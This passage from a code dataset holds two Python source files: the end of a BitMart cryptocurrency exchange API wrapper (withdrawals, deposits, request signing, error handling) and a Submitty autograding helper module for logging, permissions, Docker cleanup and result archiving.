\"type\":\"market\",\n # \"price\":\"0.00\",\n # \"price_avg\":\"0.00\",\n # \"size\":\"0.02000\",\n # \"notional\":\"0.00000000\",\n # \"filled_notional\":\"0.00000000\",\n # \"filled_size\":\"0.00000\",\n # \"status\":\"8\"\n # }\n # }\n #\n # contract\n #\n # {\n # \"code\": 1000,\n # \"trace\":\"886fb6ae-456b-4654-b4e0-d681ac05cea1\",\n # \"message\": \"OK\",\n # \"data\": {\n # \"orders\": [\n # {\n # \"order_id\": 10539098,\n # \"contract_id\": 1,\n # \"position_id\": 10539088,\n # \"account_id\": 10,\n # \"price\": \"16\",\n # \"vol\": \"1\",\n # \"done_avg_price\": \"16\",\n # \"done_vol\": \"1\",\n # \"way\": 3,\n # \"category\": 1,\n # \"make_fee\": \"0.00025\",\n # \"take_fee\": \"0.012\",\n # \"origin\": \"\",\n # \"created_at\": \"2018-07-23T11:55:56.715305Z\",\n # \"finished_at\": \"2018-07-23T11:55:56.763941Z\",\n # \"status\": 4,\n # \"errno\": 0\n # }\n # ]\n # }\n # }\n #\n data = self.safe_value(response, 'data')\n if 
'orders' in data:\n orders = self.safe_value(data, 'orders', [])\n firstOrder = self.safe_value(orders, 0)\n if firstOrder is None:\n raise OrderNotFound(self.id + ' fetchOrder() could not find ' + symbol + ' order id ' + id)\n return self.parse_order(firstOrder, market)\n else:\n return self.parse_order(data, market)\n\n def fetch_deposit_address(self, code, params={}):\n self.load_markets()\n currency = self.currency(code)\n request = {\n 'currency': currency['id'],\n }\n if code == 'USDT':\n defaultNetworks = self.safe_value(self.options, 'defaultNetworks')\n defaultNetwork = self.safe_string_upper(defaultNetworks, code)\n networks = self.safe_value(self.options, 'networks', {})\n network = self.safe_string_upper(params, 'network', defaultNetwork) # self line allows the user to specify either ERC20 or ETH\n network = self.safe_string(networks, network, network) # handle ERC20>ETH alias\n if network is not None:\n request['currency'] += '-' + network # when network the currency need to be changed to currency + '-' + network https://developer-pro.bitmart.com/en/account/withdraw_apply.html on the end of page\n params = self.omit(params, 'network')\n response = self.privateAccountGetDepositAddress(self.extend(request, params))\n #\n # {\n # \"message\":\"OK\",\n # \"code\":1000,\n # \"trace\":\"0e6edd79-f77f-4251-abe5-83ba75d06c1a\",\n # \"data\":{\n # \"currency\":\"USDT-TRC20\",\n # \"chain\":\"USDT-TRC20\",\n # \"address\":\"TGR3ghy2b5VLbyAYrmiE15jasR6aPHTvC5\",\n # \"address_memo\":\"\"\n # }\n # }\n #\n data = self.safe_value(response, 'data', {})\n address = self.safe_string(data, 'address')\n tag = self.safe_string(data, 'address_memo')\n self.check_address(address)\n return {\n 'currency': code,\n 'address': address,\n 'tag': tag,\n 'network': None, # TODO: parse\n 'info': response,\n }\n\n def withdraw(self, code, amount, address, tag=None, params={}):\n tag, params = self.handle_withdraw_tag_and_params(tag, params)\n self.check_address(address)\n self.load_markets()\n currency = self.currency(code)\n request = {\n 'currency': currency['id'],\n 'amount': amount,\n 'destination': 'To Digital Address', # To Digital Address, To Binance, To OKEX\n 'address': address,\n }\n if tag is not None:\n request['address_memo'] = tag\n if code == 'USDT':\n defaultNetworks = self.safe_value(self.options, 'defaultNetworks')\n defaultNetwork = self.safe_string_upper(defaultNetworks, code)\n networks = self.safe_value(self.options, 'networks', {})\n network = self.safe_string_upper(params, 'network', defaultNetwork) # self line allows the user to specify either ERC20 or ETH\n network = self.safe_string(networks, network, network) # handle ERC20>ETH alias\n if network is not None:\n request['currency'] += '-' + network # when network the currency need to be changed to currency + '-' + network https://developer-pro.bitmart.com/en/account/withdraw_apply.html on the end of page\n params = self.omit(params, 'network')\n response = self.privateAccountPostWithdrawApply(self.extend(request, params))\n #\n # {\n # \"code\": 1000,\n # \"trace\":\"886fb6ae-456b-4654-b4e0-d681ac05cea1\",\n # \"message\": \"OK\",\n # \"data\": {\n # \"withdraw_id\": \"121212\"\n # }\n # }\n #\n data = self.safe_value(response, 'data')\n transaction = self.parse_transaction(data, currency)\n return self.extend(transaction, {\n 'code': code,\n 'address': address,\n 'tag': tag,\n })\n\n def fetch_transactions_by_type(self, type, code=None, since=None, limit=None, params={}):\n self.load_markets()\n if limit is None:\n limit = 50 # 
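the endpoint returns at most 50 records per call\n            # usage sketch(the currency code is illustrative; the wrappers below delegate here):\n            #     deposits = exchange.fetch_deposits('USDT', limit=50)\n            #     withdrawals = exchange.fetch_withdrawals('USDT', limit=50)\n            # hard cap per page: 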
max 50\n request = {\n 'operation_type': type, # deposit or withdraw\n 'offset': 1,\n 'limit': limit,\n }\n currency = None\n if code is not None:\n currency = self.currency(code)\n request['currency'] = currency['id']\n response = self.privateAccountGetDepositWithdrawHistory(self.extend(request, params))\n #\n # {\n # \"message\":\"OK\",\n # \"code\":1000,\n # \"trace\":\"142bf92a-fc50-4689-92b6-590886f90b97\",\n # \"data\":{\n # \"records\":[\n # {\n # \"withdraw_id\":\"1679952\",\n # \"deposit_id\":\"\",\n # \"operation_type\":\"withdraw\",\n # \"currency\":\"BMX\",\n # \"apply_time\":1588867374000,\n # \"arrival_amount\":\"59.000000000000\",\n # \"fee\":\"1.000000000000\",\n # \"status\":0,\n # \"address\":\"0xe57b69a8776b37860407965B73cdFFBDFe668Bb5\",\n # \"address_memo\":\"\",\n # \"tx_id\":\"\"\n # },\n # ]\n # }\n # }\n #\n data = self.safe_value(response, 'data', {})\n records = self.safe_value(data, 'records', [])\n return self.parse_transactions(records, currency, since, limit)\n\n def fetch_deposits(self, code=None, since=None, limit=None, params={}):\n return self.fetch_transactions_by_type('deposit', code, since, limit, params)\n\n def fetch_withdrawals(self, code=None, since=None, limit=None, params={}):\n return self.fetch_transactions_by_type('withdraw', code, since, limit, params)\n\n def parse_transaction_status(self, status):\n statuses = {\n '0': 'pending', # Create\n '1': 'pending', # Submitted, waiting for withdrawal\n '2': 'pending', # Processing\n '3': 'ok', # Success\n '4': 'canceled', # Cancel\n '5': 'failed', # Fail\n }\n return self.safe_string(statuses, status, status)\n\n def parse_transaction(self, transaction, currency=None):\n #\n # withdraw\n #\n # {\n # \"withdraw_id\": \"121212\"\n # }\n #\n # fetchDeposits, fetchWithdrawals\n #\n # {\n # \"withdraw_id\":\"1679952\",\n # \"deposit_id\":\"\",\n # \"operation_type\":\"withdraw\",\n # \"currency\":\"BMX\",\n # \"apply_time\":1588867374000,\n # \"arrival_amount\":\"59.000000000000\",\n # \"fee\":\"1.000000000000\",\n # \"status\":0,\n # \"address\":\"0xe57b69a8776b37860407965B73cdFFBDFe668Bb5\",\n # \"address_memo\":\"\",\n # \"tx_id\":\"\"\n # }\n #\n id = None\n withdrawId = self.safe_string(transaction, 'withdraw_id')\n depositId = self.safe_string(transaction, 'deposit_id')\n type = None\n if (withdrawId is not None) and (withdrawId != ''):\n type = 'withdraw'\n id = withdrawId\n elif (depositId is not None) and (depositId != ''):\n type = 'deposit'\n id = depositId\n amount = self.safe_number(transaction, 'arrival_amount')\n timestamp = self.safe_integer(transaction, 'apply_time')\n currencyId = self.safe_string(transaction, 'currency')\n code = self.safe_currency_code(currencyId, currency)\n status = self.parse_transaction_status(self.safe_string(transaction, 'status'))\n feeCost = self.safe_number(transaction, 'fee')\n fee = None\n if feeCost is not None:\n fee = {\n 'cost': feeCost,\n 'currency': code,\n }\n txid = self.safe_string(transaction, 'tx_id')\n if txid == '':\n txid = None\n address = self.safe_string(transaction, 'address')\n tag = self.safe_string(transaction, 'address_memo')\n return {\n 'info': transaction,\n 'id': id,\n 'currency': code,\n 'amount': amount,\n 'address': address,\n 'addressFrom': None,\n 'addressTo': None,\n 'tag': tag,\n 'tagFrom': None,\n 'tagTo': None,\n 'status': status,\n 'type': type,\n 'updated': None,\n 'txid': txid,\n 'timestamp': timestamp,\n 'datetime': self.iso8601(timestamp),\n 'fee': fee,\n }\n\n def nonce(self):\n return self.milliseconds()\n\n def 
sign(self, path, api='public', method='GET', params={}, headers=None, body=None):\n access = self.safe_string(api, 0)\n type = self.safe_string(api, 1)\n baseUrl = self.implode_hostname(self.urls['api']['rest'])\n url = baseUrl + '/' + type\n if type != 'system':\n url += '/' + self.version\n url += '/' + self.implode_params(path, params)\n query = self.omit(params, self.extract_params(path))\n if type == 'system':\n if query:\n # print(query)\n url += '?' + self.urlencode(query)\n elif access == 'public':\n if query:\n # print(query)\n url += '?' + self.urlencode(query)\n elif access == 'private':\n self.check_required_credentials()\n timestamp = str(self.milliseconds())\n queryString = ''\n headers = {\n 'X-BM-KEY': self.apiKey,\n 'X-BM-TIMESTAMP': timestamp,\n }\n if (method == 'POST') or (method == 'PUT'):\n headers['Content-Type'] = 'application/json'\n body = self.json(query)\n queryString = body\n else:\n if query:\n queryString = self.urlencode(query)\n url += '?' + queryString\n auth = timestamp + '#' + self.uid + '#' + queryString\n signature = self.hmac(self.encode(auth), self.encode(self.secret))\n headers['X-BM-SIGN'] = signature\n return {'url': url, 'method': method, 'body': body, 'headers': headers}\n\n def handle_errors(self, code, reason, url, method, headers, body, response, requestHeaders, requestBody):\n if response is None:\n return\n #\n # spot\n #\n # {\"message\":\"Bad Request [to is empty]\",\"code\":50000,\"trace\":\"f9d46e1b-4edb-4d07-a06e-4895fb2fc8fc\",\"data\":{}}\n # {\"message\":\"Bad Request [from is empty]\",\"code\":50000,\"trace\":\"579986f7-c93a-4559-926b-06ba9fa79d76\",\"data\":{}}\n # {\"message\":\"Kline size over 500\",\"code\":50004,\"trace\":\"d625caa8-e8ca-4bd2-b77c-958776965819\",\"data\":{}}\n # {\"message\":\"Balance not enough\",\"code\":50020,\"trace\":\"7c709d6a-3292-462c-98c5-32362540aeef\",\"data\":{}}\n #\n # contract\n #\n # {\"errno\":\"OK\",\"message\":\"INVALID_PARAMETER\",\"code\":49998,\"trace\":\"eb5ebb54-23cd-4de2-9064-e090b6c3b2e3\",\"data\":null}\n #\n message = self.safe_string(response, 'message')\n errorCode = self.safe_string(response, 'code')\n if ((errorCode is not None) and (errorCode != '1000')) or ((message is not None) and (message != 'OK')):\n feedback = self.id + ' ' + body\n self.throw_exactly_matched_exception(self.exceptions['exact'], errorCode, feedback)\n self.throw_broadly_matched_exception(self.exceptions['broad'], errorCode, feedback)\n self.throw_exactly_matched_exception(self.exceptions['exact'], message, feedback)\n self.throw_broadly_matched_exception(self.exceptions['broad'], message, feedback)\n raise ExchangeError(feedback) # unknown message\n"} {"ext": "py", "sha": "1a312e02e13b66b2b41f27a3b5a39a6a2c01bd9a", "content": "\"\"\"\nWrites out submission datetime details (when it was submitted, how long it was in grading\nprocess, etc) to a history.json file which is a list of all grading attempts for a\nparticular submission (including initial grading of it and all regrades).\n\"\"\"\n\nimport os\nimport sys\nimport collections\nimport json\nfrom datetime import datetime\nfrom submitty_utils import dateutils\nimport fcntl\nimport traceback\nimport zipfile\nimport stat\nimport subprocess\nimport shutil\nimport codecs\nimport glob\nimport docker\n\nfrom typing import Optional\n\n\nclass Logger:\n \"\"\"Specialized logger class that accumulates stack traces.\"\"\"\n\n def __init__(\n self, *,\n log_dir: str,\n stack_trace_dir: str,\n capture_traces: bool = False,\n # This used to be \"UNKNOWN\", but \"NO 
JOB\" better describes the circumstances.\n job_id: str = \"NO JOB\",\n ):\n self.log_dir = log_dir\n self.stack_trace_dir = stack_trace_dir\n self.capture_traces = capture_traces\n self.accumulated_traces = []\n self.job_id = job_id\n\n def _log_filename(self) -> str:\n \"\"\"Get the name of the file that should be logged into.\n\n Currently, this is in the format YYYYMMDD.txt.\n \"\"\"\n now = dateutils.get_current_time()\n return f'{datetime.strftime(now, \"%Y%m%d\")}.txt'\n\n @property\n def log_path(self) -> str:\n \"\"\"Get the full path to the regular logging file.\"\"\"\n return os.path.join(self.log_dir, self._log_filename())\n\n @property\n def stack_trace_path(self) -> str:\n \"\"\"Get the full path to the stack trace logging file.\"\"\"\n return os.path.join(self.stack_trace_dir, self._log_filename())\n\n def log_message(\n self, message: str, *,\n is_batch: bool = False,\n which_untrusted: str = \"\",\n jobname: str = \"\",\n timelabel: str = \"\",\n elapsed_time: Optional[int] = None,\n job_id: Optional[str] = None\n ):\n \"\"\"Log a message to this logger's configured log directory.\"\"\"\n now = dateutils.get_current_time()\n easy_to_read_date = dateutils.write_submitty_date(now, True)\n batch_string = \"BATCH\" if is_batch else \"\"\n if elapsed_time is None:\n elapsed_time = -1\n elapsed_time_string = \"\" if elapsed_time < 0 else '{:9.3f}'.format(elapsed_time)\n time_unit = \"\" if elapsed_time < 0 else \"sec\"\n job_id = job_id or self.job_id\n parts = (easy_to_read_date, f\"{job_id:>6s}\", f\"{batch_string:>5s}\", f\"{which_untrusted:>11s}\",\n f\"{jobname:75s}\", f\"{timelabel:6s} {elapsed_time_string:>9s} {time_unit:>3s}\", message)\n write_to_log(self.log_path, ' | '.join((str(x) for x in parts)))\n\n def log_stack_trace(\n self, trace: str, *,\n is_batch: bool = False,\n which_untrusted: str = '',\n job_id: Optional[str] = None,\n jobname: str = \"\",\n echo_source: Optional[str] = None,\n ):\n \"\"\"Log a stack trace to this logger's configured stack trace directory.\"\"\"\n job_id = job_id or self.job_id\n # Save the parameters to this trace so we can duplicate these on the\n # shipper's end once the job finishes.\n #\n # TODO: Maybe we want to store time info too? Might need to think a bit\n # more in terms of the stack traces log file format.\n if self.capture_traces:\n self.accumulated_traces.append({\n 'trace': trace,\n 'is_batch': is_batch,\n 'which_untrusted': which_untrusted,\n 'job_id': job_id,\n 'jobname': jobname,\n })\n # Always run this since this could be deleted without us knowing\n os.makedirs(self.stack_trace_dir, exist_ok=True)\n\n now = dateutils.get_current_time()\n easy_to_read_date = dateutils.write_submitty_date(now, True)\n\n message = f\"[{easy_to_read_date}][{job_id:>6s}]\\n\"\n if echo_source is not None:\n message += f\"== (Echoed from {echo_source})\\n\"\n message += f\"== Batch? 
{is_batch}\\n\"\n message += f\"== Which: {which_untrusted}\\n\"\n message += f\"== Job: {jobname}\\n\"\n for line in trace.splitlines():\n message += f\"== {line}\\n\"\n message = message.strip()\n write_to_log(self.stack_trace_path, message)\n\n\ndef just_write_grade_history(json_file,assignment_deadline,submission_time,seconds_late,\n first_access_time,access_duration,queue_time,batch_regrade,grading_began,\n wait_time,grading_finished,grade_time,autograde_total,\n revision):\n\n #####################################\n # LOAD THE PREVIOUS HISTORY\n if os.path.isfile(json_file):\n with open(json_file, 'r') as infile:\n obj = json.load(infile, object_pairs_hook=collections.OrderedDict)\n else:\n obj = []\n\n #####################################\n # CREATE THE NEWEST INFO BLOB\n blob = collections.OrderedDict()\n blob[\"assignment_deadline\"] = assignment_deadline\n blob[\"submission_time\"] = submission_time\n seconds_late = seconds_late\n if seconds_late > 0:\n minutes_late = int((seconds_late+60-1) / 60)\n hours_late = int((seconds_late+60*60-1) / (60*60))\n days_late = int((seconds_late+60*60*24-1) / (60*60*24))\n blob[\"days_late_before_extensions\"] = days_late\n blob[\"queue_time\"] = queue_time\n blob[\"batch_regrade\"] = True if batch_regrade == \"BATCH\" else False\n blob[\"first_access_time\"] = first_access_time\n blob[\"access_duration\"] = access_duration\n blob[\"grading_began\"] = grading_began\n blob[\"wait_time\"] = wait_time\n blob[\"grading_finished\"] = grading_finished\n blob[\"grade_time\"] = grade_time\n blob[\"autograde_result\"] = autograde_total\n autograde_array = str.split(autograde_total)\n if len(autograde_array) > 0 and autograde_array[0] == \"Automatic\":\n blob[\"autograde_total\"] = int(autograde_array[3])\n if len(autograde_array) == 6:\n blob[\"autograde_max_possible\"] = int(autograde_array[5])\n if revision:\n blob[\"revision\"] = revision\n\n\n #####################################\n # ADD IT TO THE HISTORY\n obj.append(blob)\n with open(json_file, 'w') as outfile:\n json.dump(obj, outfile, indent=4, separators=(',', ': '))\n\n\n# ==================================================================================\n#\n# LOGGING FUNCTIONS\n#\n# ==================================================================================\n\n\ndef log_container_meta(log_path, event=\"\", name=\"\", container=\"\", time=0):\n \"\"\" Given a log file, create or append container meta data to a log file. \"\"\"\n\n now = dateutils.get_current_time()\n easy_to_read_date = dateutils.write_submitty_date(now, True)\n time_unit = \"sec\"\n parts = (easy_to_read_date, name, container, event, f\"{time:.3f}\", time_unit)\n write_to_log(log_path, ' | '.join(parts))\n\n\ndef write_to_log(log_path, message):\n \"\"\" Given a log file, create or append message to log file\"\"\"\n with open(log_path, 'a+') as log_file:\n try:\n fcntl.flock(log_file, fcntl.LOCK_EX | fcntl.LOCK_NB)\n print(message, file=log_file)\n fcntl.flock(log_file, fcntl.LOCK_UN)\n except:\n print(\"Could not gain a lock on the log file.\")\n\n\n# ==================================================================================\n#\n# VALIDATION FUNCTIONS\n#\n# ==================================================================================\n\ndef setup_for_validation(config, working_directory, complete_config, is_vcs, testcases, job_id):\n \"\"\" Prepare a directory for validation by copying in and permissioning the required files. 
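\n\n    Roughly: submission(and checkout / compilation) files selected by the configured patterns,\n    the expected test_output / generated_output, the instructor solution, any custom validation\n    code, and the compiled validate.out runner are all copied into TMP_WORK, which is then\n    permissioned so the untrusted validator can read and execute it.\n    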
\"\"\"\n\n tmp_submission = os.path.join(working_directory,\"TMP_SUBMISSION\")\n tmp_work = os.path.join(working_directory,\"TMP_WORK\")\n tmp_results = os.path.join(working_directory,\"TMP_RESULTS\")\n submission_path = os.path.join(tmp_submission, \"submission\")\n checkout_subdirectory = complete_config[\"autograding\"].get(\"use_checkout_subdirectory\",\"\")\n tmp_logs = os.path.join(working_directory,\"TMP_SUBMISSION\",\"tmp_logs\")\n tmp_work_test_output = os.path.join(tmp_work, \"test_output\")\n tmp_work_generated_output = os.path.join(tmp_work, \"generated_output\")\n tmp_work_instructor_solution = os.path.join(tmp_work, \"instructor_solution\")\n tmp_autograding = os.path.join(working_directory,\"TMP_AUTOGRADING\")\n\n os.mkdir(tmp_work_test_output)\n os.mkdir(tmp_work_generated_output)\n os.mkdir(tmp_work_instructor_solution)\n\n patterns = complete_config['autograding']\n\n # Add all permissions to tmp_work\n add_permissions_recursive(tmp_work,\n stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR | stat.S_IRGRP | stat.S_IWGRP | stat.S_IXGRP | stat.S_IROTH | stat.S_IWOTH | stat.S_IXOTH,\n stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR | stat.S_IRGRP | stat.S_IWGRP | stat.S_IXGRP | stat.S_IROTH | stat.S_IWOTH | stat.S_IXOTH,\n stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR | stat.S_IRGRP | stat.S_IWGRP | stat.S_IXGRP | stat.S_IROTH | stat.S_IWOTH | stat.S_IXOTH)\n\n # Copy required submission/checkout files\n pattern_copy(\"submission_to_validation\", patterns['submission_to_validation'], submission_path, tmp_work, tmp_logs)\n checkout_subdir_path = os.path.join(tmp_submission, 'checkout', checkout_subdirectory)\n if os.path.exists(checkout_subdir_path):\n pattern_copy(\"checkout_to_validation\", patterns['submission_to_validation'],checkout_subdir_path,tmp_work,tmp_logs)\n\n for c in testcases:\n if c.type == 'Compilation':\n pattern_copy(\"compilation_to_validation\", patterns['compilation_to_validation'], c.secure_environment.directory, tmp_work, tmp_logs)\n\n # Copy expected files into the tmp_work_test_output path\n test_output_path = os.path.join(tmp_autograding, 'test_output')\n copy_contents_into(config, job_id, test_output_path, tmp_work_test_output, tmp_logs)\n generated_output_path = os.path.join(tmp_autograding, 'generated_output')\n copy_contents_into(config, job_id, generated_output_path, tmp_work_generated_output, tmp_logs)\n\n # Copy in instructor solution code.\n instructor_solution = os.path.join(tmp_autograding, 'instructor_solution')\n copy_contents_into(config, job_id, instructor_solution, tmp_work_instructor_solution, tmp_logs)\n\n # Copy any instructor custom validation code into the tmp work directory\n custom_validation_code_path = os.path.join(tmp_autograding, 'custom_validation_code')\n copy_contents_into(config, job_id, custom_validation_code_path, tmp_work, tmp_logs)\n\n # Copy the .submit.notebook to tmp_work for validation\n submit_notebook_path = os.path.join(tmp_submission, 'submission', \".submit.notebook\")\n if os.path.exists(submit_notebook_path):\n shutil.copy(\n submit_notebook_path,\n os.path.join(tmp_work, '.submit.notebook')\n )\n\n\n # Copy the validation script into this directory.\n bin_runner = os.path.join(tmp_autograding, \"bin\",\"validate.out\")\n my_runner = os.path.join(tmp_work, \"my_validator.out\")\n\n shutil.copy(bin_runner, my_runner)\n\n add_permissions_recursive(tmp_work,\n stat.S_IROTH | stat.S_IWOTH | stat.S_IXOTH,\n stat.S_IROTH | stat.S_IWOTH | stat.S_IXOTH,\n stat.S_IROTH | stat.S_IWOTH | stat.S_IXOTH)\n add_permissions(my_runner, 
stat.S_IXUSR | stat.S_IXGRP |stat.S_IROTH | stat.S_IWOTH | stat.S_IXOTH)\n\n# ==================================================================================\n#\n# ARCHIVAL AND PERMISSIONS FUNCTIONS\n#\n# ==================================================================================\n\ndef add_all_permissions(path):\n \"\"\" Recursively chmod a directory or file 777. \"\"\"\n if os.path.isdir(path):\n add_permissions_recursive(path,\n stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR | stat.S_IRGRP | stat.S_IWGRP | stat.S_IXGRP | stat.S_IROTH | stat.S_IWOTH | stat.S_IXOTH,\n stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR | stat.S_IRGRP | stat.S_IWGRP | stat.S_IXGRP | stat.S_IROTH | stat.S_IWOTH | stat.S_IXOTH,\n stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR | stat.S_IRGRP | stat.S_IWGRP | stat.S_IXGRP | stat.S_IROTH | stat.S_IWOTH | stat.S_IXOTH)\n elif os.path.isfile(path):\n add_permissions(path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR | stat.S_IRGRP | stat.S_IWGRP | stat.S_IXGRP | stat.S_IROTH | stat.S_IWOTH | stat.S_IXOTH)\n\n\ndef lock_down_folder_permissions(top_dir):\n # Chmod a directory to take away group and other rwx.\n os.chmod(top_dir,os.stat(top_dir).st_mode & ~stat.S_IRGRP & ~stat.S_IWGRP & ~stat.S_IXGRP & ~stat.S_IROTH & ~stat.S_IWOTH & ~stat.S_IXOTH)\n\ndef cleanup_stale_containers(user_id_of_runner, my_log_function):\n # Remove any docker containers left over from past runs.\n client = docker.from_env(timeout=60)\n try:\n # Get all containers (running or not) with user_id_of_runner in their name\n # sparse=True gets containers without fully evaluating them. This is important,\n # as race conditions with other grading threads can cause this call to fail otherwise.\n old_containers = client.containers.list(all=True, filters={\"name\":user_id_of_runner}, sparse=True)\n for old_container in old_containers:\n try:\n my_log_function(f'Removing stale container {old_container.name}')\n old_container.remove(force=True)\n except docker.errors.NotFound:\n # This is an expected case which does not constitute an error, caused\n # by the use of sparse=True\n pass\n except Exception:\n my_log_function(\"ERROR: Could not remove docker container\")\n\n # Get all networks with user_id_of_runner in their name\n old_networks = client.networks.list(filters={\"name\":user_id_of_runner})\n for old_network in old_networks:\n try:\n my_log_function(f'Removing stale network {old_network.name}')\n old_network.remove()\n except Exception:\n my_log_function(\"ERROR: Could not remove docker network\")\n finally:\n client.close()\n\n\ndef prepare_directory_for_autograding(config, working_directory, user_id_of_runner, autograding_zip_file, submission_zip_file, is_test_environment):\n \"\"\"\n Given a working directory, set up that directory for autograding by creating the required subdirectories\n and configuring permissions.\n \"\"\"\n\n # If an old (stale) version of the working directory exists, we need to remove it.\n if os.path.exists(working_directory):\n # Make certain we can remove old instances of the working directory.\n if not is_test_environment:\n untrusted_grant_rwx_access(\n config.submitty['submitty_install_dir'], user_id_of_runner, working_directory\n )\n add_all_permissions(working_directory)\n shutil.rmtree(working_directory,ignore_errors=True)\n\n # Create the working directory\n os.mkdir(working_directory)\n\n # Important directory variables.\n tmp_autograding = os.path.join(working_directory,\"TMP_AUTOGRADING\")\n tmp_submission = os.path.join(working_directory,\"TMP_SUBMISSION\")\n 
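# layout: TMP_AUTOGRADING holds the unzipped course autograding config, TMP_SUBMISSION the\n    # unzipped student submission(plus tmp_logs), and TMP_WORK is the scratch area the grading\n    # run actually executes in\n    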
tmp_work = os.path.join(working_directory,\"TMP_WORK\")\n tmp_logs = os.path.join(working_directory,\"TMP_SUBMISSION\",\"tmp_logs\")\n submission_path = os.path.join(tmp_submission, \"submission\")\n tmp_work_test_input = os.path.join(tmp_work, \"test_input\")\n\n os.mkdir(tmp_work)\n os.mkdir(tmp_work_test_input)\n\n # Unzip the autograding and submission folders\n unzip_this_file(autograding_zip_file,tmp_autograding)\n unzip_this_file(submission_zip_file,tmp_submission)\n\n\n with open(os.path.join(tmp_autograding, \"complete_config.json\"), 'r') as infile:\n complete_config_obj = json.load(infile)\n\n # Handle the case where a student errantly submits to multiple parts of a one part only gradeable.\n if complete_config_obj.get('one_part_only', False) == True:\n allow_only_one_part(submission_path, log_path=os.path.join(tmp_logs, \"overall.txt\"))\n\n with open(os.path.join(tmp_submission,\"queue_file.json\"), 'r') as infile:\n queue_obj = json.load(infile)\n job_id = queue_obj[\"job_id\"]\n\n # copy output files\n test_input_path = os.path.join(tmp_autograding, 'test_input')\n # Copy test input files into tmp_work_test_input.\n copy_contents_into(config, job_id, test_input_path, tmp_work_test_input, tmp_logs)\n\n # Lock down permissions on the unzipped folders/test input folder to stop untrusted users from gaining access.\n lock_down_folder_permissions(tmp_work_test_input)\n lock_down_folder_permissions(tmp_autograding)\n lock_down_folder_permissions(tmp_submission)\n\n\ndef archive_autograding_results(\n config,\n working_directory: os.PathLike,\n job_id: str,\n which_untrusted: str,\n is_batch_job: bool,\n complete_config_obj: dict,\n gradeable_config_obj: dict,\n queue_obj: dict,\n is_test_environment: bool\n):\n \"\"\" After grading is finished, archive the results. 
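    Work files matching the configured patterns are copied into TMP_RESULTS
    (details and, optionally, public results), grade.txt and results.json are
    copied over, a history.json entry is written, and the tmp_logs directory
    is saved alongside the results.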
\"\"\"\n\n tmp_autograding = os.path.join(working_directory,\"TMP_AUTOGRADING\")\n tmp_submission = os.path.join(working_directory,\"TMP_SUBMISSION\")\n tmp_work = os.path.join(working_directory,\"TMP_WORK\")\n tmp_logs = os.path.join(working_directory,\"TMP_SUBMISSION\",\"tmp_logs\")\n tmp_results = os.path.join(working_directory,\"TMP_RESULTS\")\n submission_path = os.path.join(tmp_submission, \"submission\")\n random_output_path = os.path.join(tmp_work, 'random_output')\n\n if \"generate_output\" not in queue_obj:\n partial_path = os.path.join(queue_obj[\"gradeable\"],queue_obj[\"who\"],str(queue_obj[\"version\"]))\n item_name = os.path.join(queue_obj[\"semester\"],queue_obj[\"course\"],\"submissions\",partial_path)\n elif queue_obj[\"generate_output\"]:\n item_name = os.path.join(queue_obj[\"semester\"],queue_obj[\"course\"],\"generated_output\",queue_obj[\"gradeable\"])\n results_public_dir = os.path.join(tmp_results,\"results_public\")\n results_details_dir = os.path.join(tmp_results, \"details\")\n patterns = complete_config_obj['autograding']\n\n # Copy work to details\n pattern_copy(\"work_to_details\", patterns['work_to_details'], tmp_work, results_details_dir, tmp_logs)\n\n # Copy work to public\n if 'work_to_public' in patterns:\n pattern_copy(\"work_to_public\", patterns['work_to_public'], tmp_work, results_public_dir, tmp_logs)\n\n if os.path.exists(random_output_path):\n pattern_copy(\"work_to_random_output\", [os.path.join(random_output_path, '**', '*.txt'),], tmp_work, tmp_results, tmp_logs)\n # timestamp of first access to the gradeable page\n first_access_string = \"\"\n # grab the submission time\n if \"generate_output\" in queue_obj and queue_obj[\"generate_output\"]:\n submission_string = \"\"\n else:\n with open(os.path.join(tmp_submission, 'submission' ,\".submit.timestamp\"), 'r') as submission_time_file:\n submission_string = submission_time_file.read().rstrip()\n # grab the first access to the gradeable page (if it exists)\n user_assignment_access_filename = os.path.join(tmp_submission, \".user_assignment_access.json\")\n if os.path.exists(user_assignment_access_filename):\n with open(user_assignment_access_filename, 'r') as access_file:\n obj = json.load(access_file)\n first_access_string = obj[0][\"timestamp\"]\n\n history_file_tmp = os.path.join(tmp_submission,\"history.json\")\n history_file = os.path.join(tmp_results,\"history.json\")\n if os.path.isfile(history_file_tmp) and not is_test_environment:\n shutil.move(history_file_tmp, history_file)\n # fix permissions\n ta_group_id = os.stat(tmp_results).st_gid\n os.chown(history_file, int(config.submitty_users['daemon_uid']),ta_group_id)\n add_permissions(history_file, stat.S_IRGRP)\n grading_finished = dateutils.get_current_time()\n grade_result = \"\"\n if \"generate_output\" not in queue_obj:\n try:\n shutil.copy(os.path.join(tmp_work, \"grade.txt\"), tmp_results)\n with open(os.path.join(tmp_work,\"grade.txt\")) as f:\n lines = f.readlines()\n for line in lines:\n line = line.rstrip('\\n')\n if line.startswith(\"Automatic grading total:\"):\n grade_result = line\n except:\n with open(os.path.join(tmp_logs,\"overall.txt\"),'a') as f:\n f.write(f\"\\n\\nERROR: Grading incomplete -- Could not process {os.path.join(tmp_work,'grade.txt')}\")\n config.logger.log_message(\n \"ERROR: could not process grade.txt. 
See stack trace entry for more details.\",\n job_id=job_id,\n is_batch=is_batch_job,\n which_untrusted=which_untrusted,\n jobname=item_name,\n )\n config.logger.log_stack_trace(\n traceback.format_exc(),\n job_id=job_id,\n is_batch=is_batch_job,\n which_untrusted=which_untrusted,\n jobname=item_name,\n )\n\n gradeable_deadline_string = gradeable_config_obj[\"date_due\"]\n submission_datetime = dateutils.read_submitty_date(submission_string)\n gradeable_deadline_datetime = dateutils.read_submitty_date(gradeable_deadline_string)\n gradeable_deadline_longstring = dateutils.write_submitty_date(gradeable_deadline_datetime)\n submission_longstring = dateutils.write_submitty_date(submission_datetime)\n seconds_late = int((submission_datetime-gradeable_deadline_datetime).total_seconds())\n # compute the access duration in seconds (if it exists)\n access_duration = -1\n if first_access_string != \"\":\n first_access_datetime = dateutils.read_submitty_date(first_access_string)\n access_duration = int((submission_datetime-first_access_datetime).total_seconds())\n\n # note: negative = not late\n grading_finished_longstring = dateutils.write_submitty_date(grading_finished)\n\n with open(os.path.join(tmp_submission,\".grading_began\"), 'r') as f:\n grading_began_longstring = f.read()\n grading_began = 